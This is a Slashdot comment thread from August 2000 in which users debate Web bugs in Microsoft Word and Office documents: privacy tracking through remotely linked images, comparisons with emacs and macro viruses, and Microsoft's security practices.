  • Yup, we do. Does "Git a rope!" mean anything to you?

    (For the clueless, this is a reference to a famous Pace Picante Sauce commercial - a group of cowhands on the trail are looking at the salsa provided by their new "cookie" and discover it's not the good stuff from San Antonio, but is made in "New York City??!!". The lead cowpoke turns to another and orders, "Git a rope!", as Cookie gulps and realizes he's about to get stretched. The only reason I bother to explain this is for non-US readers...)
  • What you have to realize is that while Word documents might be a big deal today, in the fast paced world of computing, they really won't be significant in the future. A new medium - a method - of transferring and communication between hosts, indeed - systems, business, communications and other systems - is emerging. XML.

    I really hope we live in such a utopia someday.

    But, how long has there been a Microsoft Word? How much human information, knowledge, and communication is bound up in Microsoft Word documents, and how long will much of that legacy be relevant?

    And, considering how long there has been one, and the size and relevance of the legacy-- how long do you think we'll be dealing with binary formats like Word?

    The future usually maps better to William Gibson and Ridley Scott: There's the new, but those old layers of decades dirty old grunge and tech still persist refusing to die. I predict that we'll still need to open MS Word documents in 2010. Hell, I just had to open a WP v4 document the other day..

    • The EFF or some such group should probably have a project to uncover and track such nasties.
    Not easy without the source.

    Now, what would be a good idea, would be to write a new, open source, OS, web browser, and office suite. If these were open source, it would be quite transparant when people tried to sneak this kind of crap into their products.

    :-)
    G

  • Is that all that goes on here anymore. Let's all take potshots at MS anytime they do anything! I can think of a couple of good things about this.

    Tracking internal document consumption - If you can place a cookie, you can track who and how many time something is read.

    Changing document data to reflect different visitations. If a user has already read the document and it hasn't changed it doesnt download the Word document.

    I am reminded of a Shakespeare when I hear this: (approximation) Nothing is neither good nor evil but thinking makes it so. Of course somebody can do something malicious, but somebody can also do something positive. If your that worried about it, download the document, open up your favorite text editor (insert here), open the Word document, strip out the header and footer information, and read it. Very simple. And for the joker who will point out what it if has pictures or some really brutal formatting that doesnt show up; well tell the folks that put it up on the website to save their document as HTML or a TXT file. Laters

    /me gets off my soapbox
    Hangtime

    If you continue to think what you have always thought, you will continue to get what you have always got.
    -Anonymous
  • Most people (I would hope) would send their resumes in formats their potential employer suggests and/or states that they accept. If they don't specify, fax and/or mail it. If they say "electronic", I'd e-mail them a text copy with a URL to an HTML copy. If they say "Word" (and some do), Word is what they'll get.

    Major companies nowadays are requesting only textual resumes. This way they are light on space, can be easily searched and easily integrated in the company's internal resume system (assuming they have one), and people within the company looking for applicants have to do less work and can deal with a standardized document format. It's rare that a company will request a Word format, but it happens.

    If someone is blindly sending you a resume in Word, there are other reasons to reject it that don't necessarily have anything to do with the applicant's skills at system security.
  • by pohl ( 872 ) on Wednesday August 30, 2000 @11:33AM (#815439) Homepage
    Hmmm...I open a document, and it contains some emacs lisp code...how does this code become executed automatically without me instructing emacs to do so? I know that I can use M-x eval-buffer, or select a region and use M-x eval-region -- but in order to be analagous to a Word macro virus, wouldn't emacs have to automatically execute the contents of the file without my direction to do so? If this is the case, point this feature out to me. I'm curious.
  • Thanks for the info; but I still don't see how a web bug is useful.

    To get the ISP logs, presumably, you need a subpeona, which means it's a criminal issue. If they are backtracking from an emailed document, couldn't use the recipient's server info, to backtrack the email to your ISP, and then to you.

    But if the web bug is a marketing tool, will the company be able to convert my dynamic IP to my email, username, etc. without those server logs? I guess it is helpful in that it would give general information about how a document is being spread geographically, and perhaps what companies are accessing it. But that's pretty vauge, and certainly not a personal privacy problem.

    I don't want to imply I think this is a good thing, but I don't see how it's a big deal so far (at least until everyone has their own static IP).
    -----
    D. Fischer
  • by po_boy ( 69692 ) on Wednesday August 30, 2000 @11:34AM (#815441)
    phil_reed asked:
    Has anybody checked to see if the same thing happens in Excel?

    I cannot stress this enough, people. Read the articles referenced by slashdot before you post obvious questions.

    The article clearly states:

    In addition to Word documents, Web bugs can also be used in Excel 2000 and PowerPoint 2000 documents.

    So I would imagine that the answer is "yes. Someone has checked."

  • You're making the assumption that the person doing the tracking automatically knows the identity of the person doing the reading. The only thing these "bugs" can tell the "bugger" is the IP address of the person reading the document. I guess you can insert some sort of unique ID into the resume so that you can tell what version of the document they're reading (sending a slightly different version of the document to each person you originally send it to). Could be good for detecting information leaks, but isn't very useful for figuring out the identity of the person actually reading the document, unless you have the ability of going to the ISP and retrieving the identity from them, or if perhaps you have some cookies already set up with identifying information. Either way, that's a lot of if's.

    Generally speaking, downloading a Word document from the web only nets the malicious user your IP address and/or hostname, nothing more than what they would get if you browsed an "evil" web page at their web site.
  • by baka_boy ( 171146 ) <lennon@@@day-reynolds...com> on Wednesday August 30, 2000 @11:34AM (#815443) Homepage
    What, you meant implement some basic sort of sane security policies to prevent a single user's mistakes from fsck'ing the whole system? Or even design an OS with networking and multiuser access in mind? (Wow, that sure would be awfully tough...fifteen years ago, before it had been done almost every one of the flavors of UNIX.)

    Or maybe you mean a more advanced architecture -- one that could apply different security models to code depending on whether it was being executed from a local or remote source, and which put potentially "suspect" applications into a limited sandbox? (Why, that sounds an awful lot like Java, circa the mid-90s...)

    Basically, Microsoft, however good they are at UI design, code reuse, or marketing, often drops the ball when it comes to security. They push the envelope of functionality far before they're ready to deal with the vulnerabilities that it can cause. That wouldn't even bother me so much if they didn't try to pass their tools off as "secure by default," and keep problems and risks under wraps until they can be silently patched in the next service pack.

  • by Shadowkiller ( 160972 ) on Wednesday August 30, 2000 @11:42AM (#815447)

    This may be totally offtopic, but I think this troll may be onto something. What if someone were to embed the DeCSS code into a Word macro virus? Just imagine the possibilities!

    Each time someone opens an infected document, it spreads copies the code into all .doc files on the hard drive. Given all the mystery bloat that typically accompanies Word documents anyway, I doubt anyone would even notice.

    As an added bonus, the Outlook-enhanced version could also send copies to 50 people in the address book!

    Before long, if it circulates far enough, we might even be getting copies of DeCSS which were inadvertantly sent directly MPAA themselves! Oh, sweet irony.

  • I've read that article three times now and still disagree. The premise, apparently, is that technology will destroy privacy in the form of increasingly undetectible surveilance, so we'd better get used to it and embrace it. Whether we do or not, it will be used against us.

    I don't buy it. The premise that privacy and anonymity are a necessary casualty of technological advance is not necessarily true. It has been true thus far largely because privacy wasn't a design consideration in many of the systems we used. Most internet protocols were not designed to support privacy. HTTP is certainly in that category. The message is going out that privacy should be a design consideration. Zero Knowledge, for example, offers an service which reportedly encrypts your traffic and passes it through a series of servers to hide content and origin. Common cleartext protocols like telnet and ftp are being replaced by encrypted alternatives. Mr. Brin discusses privacy degrading technologies but doesn't concern himself with privacy preserving technologies which will grow in parallel.

    Realize too that concern about loss of privacy is well founded. If and when privacy evaporates there will be consequences, and not just decreased crime, which isn't necessarily true either. How many convenience store robberies have you seen on the local news, committed right in front of the obvious cameras? Criminals aren't known for their intelligence. Recall the story of the gentleman who fell in the supermarket and was confronted with his purchase record, which included regular purchases of alcohol, and the threat that this record would be used in any lawsuit brought against the store. Just because you've done nothing wrong, but rather something "everyone" does now and again, doesn't mean that information (which, quite frankly, is none of their concern) won't be misrepresented and turned against you.

    I've honored your request and read the article (again). Please do something useful as well: read Database Nation [amazon.com] and understand the consequence of burning the privacy bridge. It's not an easy one to rebuild.

  • by DHartung ( 13689 ) on Wednesday August 30, 2000 @11:45AM (#815450) Homepage
    As well as any other Office applications, when they launch an HTML type of document. It's pretty easy to grant permission this one time only, too -- so you always know if programs that normally shouldn't be net-enabled are trying to slip one past you.

    Clearly you don't realize how either the "Internet Explorer component", or ZoneAlarm, works. Though Word uses the same HTML renderer, it is from within its own EXE. Granted, I don't kid myself that this will trap ALL instances of non-obvious internet use, but it goes a long way towards making me feel like I'm still in control.
    ----
  • > Basically, Microsoft [...] often drops the ball when it comes to security.

    True, true. Except when it comes to making file system security understandable to mere mortals. I'm still somewhat in the dark regarding file access privileges. The other week I couldn't share a folder on my drive out as read-only, no matter what I did other users couldn't see the contents of subfolders. Eventually it turned out that the subfolders of this folder had somehow received their own privileges and the parent folder's security settings weren't being inherited. I had to go through all the subfolders and files and reset the privileges on each one before it finally worked. Ok, somewhat off topic, but still regarding MS-and-security.

    Uwe Wolfgang Radu
  • Oh, I agree [slashdot.org] with you that this isn't a big deal from a privacy perspective. But you asked if a dynamic IP could mask your personal identity, and the short answer is, it can't. So someone who really wanted to know, and had the (legal, technological?) means to find out, could find out who you are.

    But you give out your IP every time you surf to any webpage anywhere, so this Word document *feature* is no worse a privacy concern than Apache weblogs, in my opinion. In fact, I would argue that this is a very useful feature. Most of the complaints seem to be knee-jerk anti-M$ sound and fury.


    JOIN !LINK CLUB! [slashdot.org]
  • by ink ( 4325 ) on Wednesday August 30, 2000 @11:48AM (#815455) Homepage
    GNU emacs can do all of these things to (including harboring document virii). What's the diff?

    That's not true. Emacs does not execute arbitrary lisp code embedde in a document. It certainly doesn't follow hyperlinks and set up cookies transparently. You have to explicitly do all of these things.

    The wheel is turning but the hamster is dead.

  • Star Office

    Good point. From the Document Web Bugs FAQ [privacyfoundation.org]:

    4. Are there any other programs that can use document Web bugs?

    Yes. The Privacy Foundation has found examples of this image linking ability in Microsoft's Office Suite, such as in PowerPoint 2000 and Excel 2000. They have also been detected in Sun Microsystems' Star Office.

    HTH, HAND.


    Cheers,

  • by __aapbgd5977 ( 124658 ) on Wednesday August 30, 2000 @01:29PM (#815488)
    Ok, so if the Privacy Foundation is so upset about web bugs in MS Word documents, why does their OWN ADVISORY have a web bug in it? My filter (Guidescope) caught this little sucker: http://www.privacyfoundation.org/graphics/1pix.gif (Awaiting an explanation.)
    ==
    This post sponsored by the American Obstetrics Society:
  • by jamiemccarthy ( 4847 ) on Wednesday August 30, 2000 @03:15PM (#815502) Homepage Journal
    "Jamie is a fucking liar."

    tealover, I don't see an email address for you in your user info. Because you're misquoting Hemos and saying some pretty outlandish stuff, I suppose you're just trolling. But if you'd like to talk seriously about this, please just email me [mailto] and I can clear up any questions you might have.

    I don't think trying to allay your fears in posts here is going to be very fruitful. I'm not trying to silence you here, though; it goes without saying that any email discussion we'd have about this, you could feel free to post.

    Jamie McCarthy

  • by Philippe ( 3665 ) on Wednesday August 30, 2000 @03:29PM (#815504) Homepage
    It's a spacer gif. Big deal. Web designers use them all the time. Plus, it's not a web bug since it originates on the same server.

C makes it easy for you to shoot yourself in the foot. C++ makes that harder, but when you do, it blows away your whole leg. -- Bjarne Stroustrup

Working...